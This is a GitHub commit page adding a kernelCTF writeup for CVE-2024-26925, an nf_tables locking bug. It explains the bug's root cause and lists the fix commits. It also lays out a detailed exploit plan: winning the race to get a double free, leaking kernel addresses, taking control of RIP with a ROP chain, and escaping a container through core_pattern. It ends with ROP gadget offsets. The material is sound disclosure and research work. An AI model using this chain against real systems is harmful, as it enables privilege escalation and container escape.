Skip to content

Commit

Permalink
Add kernelCTF CVE-2024-26925_lts_cos (#106)
Browse files Browse the repository at this point in the history
* Update CVE-2024-26925_lts_cos

* Use softlink to merge all files

* Update exploit.md

* Update vulnerability.md
  • Loading branch information
HexRabbit authored Jul 3, 2024
1 parent fa6e35b commit 5c8c44e
Show file tree
Hide file tree
Showing 21 changed files with 1,410 additions and 0 deletions.
178 changes: 178 additions & 0 deletions pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,178 @@
# Exploit details
The vulnerability is a locking issue that resides in __nf_tables_abort() during the call to nf_tables_module_autoload(),
which releases the mutex lock and causes GC sequence protection to be bypassed. To exploit this vulnerability,
we must find a reliable way to race the abort thread and the set GC thread. By doing so, we can turn this locking
issue into a double-free primitive.

## Module Autoload

Since nftables object types (e.g., `nft_tunnel_obj_type`, `nft_quota_obj_type`, etc.) might reside in external kernel modules,
encountering a type currently not present in nftables will first add the typename to `nft_net->module_list` and attempt
to load the corresponding type's kernel module during the abort phase via `nf_tables_module_autoload()`.

Therefore, `nf_tables_module_autoload()` can be triggered by requesting a non-existent object type in a batch commit.

```c
static const struct nft_object_type *
nft_obj_type_get(struct net *net, u32 objtype, u8 family)
{
const struct nft_object_type *type;

rcu_read_lock();
type = __nft_obj_type_get(objtype, family);

// ...

#ifdef CONFIG_MODULES
if (type == NULL) { // if type does not exist
if (nft_request_module(net, "nft-obj-%u", objtype) == -EAGAIN)
return ERR_PTR(-EAGAIN);
}
#endif
return ERR_PTR(-ENOENT);
}
```
```c
__printf(2, 3) int nft_request_module(struct net *net, const char *fmt, ...)
{
// ...
nft_net = nft_pernet(net);
list_for_each_entry(req, &nft_net->module_list, list) {
if (!strcmp(req->module, module_name)) {
if (req->done)
return 0;
/* A request to load this module already exists. */
return -EAGAIN;
}
}
req = kmalloc(sizeof(*req), GFP_KERNEL);
if (!req)
return -ENOMEM;
req->done = false;
strscpy(req->module, module_name, MODULE_NAME_LEN);
list_add_tail(&req->list, &nft_net->module_list); // add to request list
return -EAGAIN;
}
```

## Race to Double Free

With this vulnerability, we can make the set GC procedure record the GC sequence and acquire the mutex lock
within the call to `__nf_tables_abort()` to bypass the GC sequence check. The goal is to free
the same set element twice during the handling of a batch commit.

The race process is as follows:
- New `setelem A`
- New unknown type object (trigger `__nf_tables_abort()`)
- `nft_rhash_gc()` records expired `setelem A`
- `setelem A `unlinks from the set, `kfree`'d
- module autoload releases mutex lock
- `nft_trans_gc_work_done()` acquires mutex lock, bypassing GC sequence check
- `setelem A` `kfree`'d second time

To increase the success rate of the race (and capture the kernelctf slot), we need to enlarge the two time windows in the race process:
1. For the GC thread, we want its timer to wake up and record `setelem A` after `__nf_tables_abort()` starts but before `setelem A` is removed from the set. Otherwise, `setelem A` cannot be recorded.
2. The module loading time should be long enough to ensure that `nft_trans_gc_work_done()` can acquire the mutex lock.

To delay the removal of `setelem A` in `__nf_tables_abort()` from the set, we can add many operations after the creation of
`setelem A` in the batch commit. Since `__nf_tables_abort()` processes batch commit operations in reverse order,
these operations will be processed before removing `setelem A`.

In order to maximize this delay, we pre-allocate multiple anonymous sets (`NFT_SET_MAP`) with many elements,
reference them through `dynset` expressions, and delete these expressions via `NFT_MSG_DELRULE` at the end of the batch commit.
This ensures that `nft_map_activate()` is called to traverse all set elements during the abort process, delaying the removal of `setelem A`.

For the module autoload part, since all types waiting for autoload will not be removed from `nft_net->module_list`
even after autoloading finishes, and `nf_tables_module_autoload()` will always try to load the type in the list without
checking if `req->done` is set, each autoload trigger will reload all previously autoloaded types.

```c
static void nf_tables_module_autoload(struct net *net)
{
struct nftables_pernet *nft_net = nft_pernet(net);
struct nft_module_request *req, *next;
LIST_HEAD(module_list);

list_splice_init(&nft_net->module_list, &module_list);
mutex_unlock(&nft_net->commit_mutex);
list_for_each_entry_safe(req, next, &module_list, list) {
request_module("%s", req->module);
req->done = true;
}
mutex_lock(&nft_net->commit_mutex);
list_splice(&module_list, &nft_net->module_list);
}
```
Therefore, we only need to attempt autoloading non-existent and non-repeating object types N times before
the new `setelem A` operation. Finally, triggering autoload with a non-existent object type after the new `setelem A` will trigger `request_module()` N+1 times.
With the above adjustments, the batch commit used in the exploit includes the following operations:
- New unknown type object (1)
- ...
- New unknown type object (N)
- New `setelem A` (kmalloc-cg-256)
- Delete all dynset expressions (deactivate all pre-allocated setelems)
- New unknown type object (N+1)
By extending the two race windows mentioned above, we should be able to reliably trigger the race condition and cause a double free, right?
Actually, **no**. We were surprised to find that even if we extend the processing time of pre-allocated set elements to the scale of seconds,
`nft_rhash_gc()` still doesn't race with `__nf_tables_abort()`.
We later found that for some reason, `nft_rhash_gc()` will not be scheduled by `system_power_efficient_wq` during high CPU usage.
```c
static void nft_rhash_gc_init(const struct nft_set *set)
{
struct nft_rhash *priv = nft_set_priv(set);
queue_delayed_work(system_power_efficient_wq, &priv->gc_work,
nft_set_gc_interval(set));
}
```

In our case, re-activating all pre-allocated set elements
in `__nf_tables_abort()` will cause high CPU usage, thus `nft_rhash_gc()` will not be scheduled.
To solve this problem, we switch the main thread to a different CPU using `set_cpu()` before the race.
Additionally, this provides a bonus: the slab allocator will not detect our double free because the same object is freed by two different CPUs.

Once we can reliably trigger the race to cause double free, the free list in kmalloc-cg-256 will be `[A, A]`.

## KASLR Bypass

After obtaining the double free primitive, I used the same exploit method as in [CVE-2023-4004](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/docs/exploit.md).
Since there are now two elements A that have been double freed in the kmalloc-cg-256 free list, we can overlap `nft_table`'s `table->udata` with the `nft_object` object to leak `obj->ops` (address of `nft_ct_expect_obj_ops`).
- New `table A` (with `NFTA_TABLE_USERDATA` data length equals 256)
- New `object B` (`nft_ct_expect_obj`)
- Dump `table A` (leaking `object B` structure)

After leaking the kernel address, restore the free list state to `[A, B, A]` to facilitate subsequent operations.

## Control RIP

At this stage, we again overlap `nft_table`'s `table->udata` with the `nft_object` object to control the `obj->ops` function table pointer, thereby controlling the RIP.

We will first leak kernel heap address which we used to store fake `obj->ops` function pointer table.
- New `table A` (with `NFTA_TABLE_USERDATA` data length equals 256)
- New `table B` (with `NFTA_TABLE_USERDATA` data length equals 256)
- New `object C` (providing `NFTA_OBJ_USERDATA`, later used for faking `obj->ops`)
- Dump `table A` (leaking `obj->udata`)

Then reallocate table to modify the overlapped `object C` and call to `obj->ops->dump` to trigger ROP
- Delete `table A`
- New `table D` (setting `obj->ops` to `obj->udata`, setting ROP chain)
- Dump `object C` (triggering ROP chain)

## Container Escape

We reuse the the exploit technique from [CVE-2023-4622](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4622_lts/docs/exploit.md#achieve-container-escape).

By rewriting `core_pattern` to `|/proc/%P/fd/<fd number>` and placing the binary in the corresponding fd via `memfd_create()`,
we can execute any binary outside the container when a coredump is triggered.
174 changes: 174 additions & 0 deletions pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/vulnerability.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,174 @@
# Vulnerability Details
A locking issue was found in the Linux kernel netfilter/nftables subsystem (`net/netfilter/nf_tables_api.c`),
it leads to breaking the assumption in set asynchronous GC, which can be use to cause double free.

The asynchronous set GC (`nft_rhash_gc` for example) does not acquire commit lock while doing the work,
instead, it use GC sequence (`gc_seq`) mechanism to protect it from racing with the transaction.
At the begin of `nft_rhash_gc` It will save the current GC sequence and allocate a GC transaction
to store information, then traverse the set to record all expired set element into GC transaction,
and finally call `nft_trans_gc_queue_async_done(gc)`.

```c
static void nft_rhash_gc(struct work_struct *work)
{
// ...
gc_seq = READ_ONCE(nft_net->gc_seq); // save GC sequence

if (nft_set_gc_is_pending(set))
goto done;

gc = nft_trans_gc_alloc(set, gc_seq, GFP_KERNEL);
if (!gc)
goto done;

// ...
while ((he = rhashtable_walk_next(&hti))) {
// check if setelem expired
if (!nft_set_elem_expired(&he->ext))
continue;

// ...
nft_trans_gc_elem_add(gc, he);
}

if (gc)
nft_trans_gc_queue_async_done(gc);

// ...
}
```
The function `nft_trans_gc_queue_async_done(gc)` saves the GC transaction into a global list and eventually schedules
`nft_trans_gc_work()` to run. `nft_trans_gc_work()` then retrieves the gc transaction and calls `nft_trans_gc_work_done()`
to perform check on GC sequence.
```c
static void nft_trans_gc_work(struct work_struct *work)
{
// ...
list_for_each_entry_safe(trans, next, &trans_gc_list, list) {
list_del(&trans->list);
if (!nft_trans_gc_work_done(trans)) { // do the check here
nft_trans_gc_destroy(trans);
continue;
}
call_rcu(&trans->rcu, nft_trans_gc_trans_free);
}
}
```

The function `nft_trans_gc_work_done()` will first acquire the commit lock, and compare the saved GC sequence
with current GC sequence, if they are different, means we race with the transaction, since all critical section
which modify the control plane are surrounded by `nft_gc_seq_begin()` and `nft_gc_seq_end()` which both increase
the current GC sequence (`nft_net->gc_seq`), so if it's the case, it means the state of the set may have been changed,
and the function will return false to stop processing this GC transaction.


```c
static bool nft_trans_gc_work_done(struct nft_trans_gc *trans)
{
struct nftables_pernet *nft_net;
struct nft_ctx ctx = {};

nft_net = nft_pernet(trans->net);

mutex_lock(&nft_net->commit_mutex); // acquire global mutex

/* Check for race with transaction, otherwise this batch refers to
* stale objects that might not be there anymore. Skip transaction if
* set has been destroyed from control plane transaction in case gc
* worker loses race.
*/
if (READ_ONCE(nft_net->gc_seq) != trans->seq || trans->set->dead) { // check gc sequence to prevent race
mutex_unlock(&nft_net->commit_mutex);
return false;
}

ctx.net = trans->net;
ctx.table = trans->set->table;

nft_trans_gc_setelem_remove(&ctx, trans);
mutex_unlock(&nft_net->commit_mutex);

return true;
}
```
However, the GC sequence mechanism only works under the assumption that the commit lock should not be released
during the critical section between `nft_gc_seq_begin()` and `nft_gc_seq_end()`. Otherwise, a GC thread
may record the expired object and obtain the released commit lock within the same `gc_seq`, thus bypassing the GC sequence check.
`__nf_tables_abort()` is the one does it wrong, the function is surrounded by `nft_gc_seq_begin()` and `nft_gc_seq_end()`,
if it received the action `NFNL_ABORT_AUTOLOAD`, `nf_tables_module_autoload()` will be called to process the module requests,
however, the function release the commit lock before processing the module request, which breaks the assumption of GC
sequence and leads to double free.
```c
static int nf_tables_abort(struct net *net, struct sk_buff *skb,
enum nfnl_abort_action action)
{
gc_seq = nft_gc_seq_begin(nft_net); // gc_seq++
ret = __nf_tables_abort(net, action);
nft_gc_seq_end(nft_net, gc_seq); // gc_seq++
mutex_unlock(&nft_net->commit_mutex);
return ret;
}
static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
{
// ...
if (action == NFNL_ABORT_AUTOLOAD)
nf_tables_module_autoload(net); // load modules
else
nf_tables_module_autoload_cleanup(net);
return 0;
}
static void nf_tables_module_autoload(struct net *net)
{
struct nftables_pernet *nft_net = nft_pernet(net);
struct nft_module_request *req, *next;
LIST_HEAD(module_list);
list_splice_init(&nft_net->module_list, &module_list);
mutex_unlock(&nft_net->commit_mutex); // BUG: release mutex lock inside GC sequence critical section
list_for_each_entry_safe(req, next, &module_list, list) {
request_module("%s", req->module);
req->done = true;
}
mutex_lock(&nft_net->commit_mutex);
list_splice(&module_list, &nft_net->module_list);
}
```

## Requirements to trigger the vulnerability
- Capabilities: `CAP_NET_ADMIN` capability is required.
- Kernel configuration: `CONFIG_NETFILTER``CONFIG_NF_TABLES`
- User namespace: As this vulnerability requires `CAP_NET_ADMIN`, which is not usually given to the normal user, we used the unprivileged user namespace to achieve this capability.

## Commit which introduced the vulnerability
- The vulnerability was introduced in Linux v6.5, with commit [720344340fb9be2765bbaab7b292ece0a4570eae](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=720344340fb9be2765bbaab7b292ece0a4570eae)
- An incomplete fix to new GC transaction API introduced this vulnerability.

## Commit which fixed the vulnerability
- The vulnerability was fixed in Linux v6.9-rc3, with commit [0d459e2ffb541841714839e8228b845458ed3b27](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0d459e2ffb541841714839e8228b845458ed3b27)
- The commit move the call to `nf_tables_module_autoload()` after `nft_gc_seq_end()` to fix the check.

## Affected kernel versions
- Linux version v6.5 ~ v6.9-rc2 affects to this vulnerability
- For LTS versions
- v5.15.134 ~
- v6.1.56 ~

## Affected component, subsystem
- netfilter/nf_tables

## Cause (UAF, BoF, race condition, double free, refcount overflow, etc)
- Locking issue leads to double free

## Which syscalls or syscall parameters are needed to be blocked to prevent triggering the vulnerability? (If there is any easy way to block it.)
- Disable syscalls for netfilter (specifically, nftables) subsystem (ex. `socket``sendmsg` with netlink socket) to prevent this vulnerability.
- Disable syscalls for unprivileged user namespace (ex. `clone``unshare`) can reduce the attack surface since the netfilter subsystem requires `CAP_NET_ADMIN` to use.
Binary file not shown.
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
#include <stddef.h>
#include <unistd.h>
size_t nft_ct_expect_obj_type = 0x271c120;
size_t nft_ct_expect_obj_ops = 0x1acba40;
size_t core_pattern = 0x259e7a0;
size_t rcu_read_unlock = 0x120127b; // Symbol '__rcu_read_unlock' not found. (use ret here)
size_t copy_from_user = 0x776520;
size_t delay_loop = 0x7d6c70;

size_t pop_rdi = 0x81910;
size_t pop_rsi = 0x1a9d38;
size_t pop_rdx = 0x1a9725;
size_t pop_3 = 0x68158; // pop r12 ; pop rbp ; pop rbx ; ret
size_t pop_rsp_ret = 0x106deb;
size_t add_rsp_0x50 = 0x190786; // add rsp, 0x50 ; jmp 0xffffffff82203980 (ret)
size_t push_rsi_jmp_deref_rsi_0x39 = 0x8a2d27; // push rsi ; jmp qword ptr [rsi + 0x39]
Loading

0 comments on commit 5c8c44e

Please sign in to comment.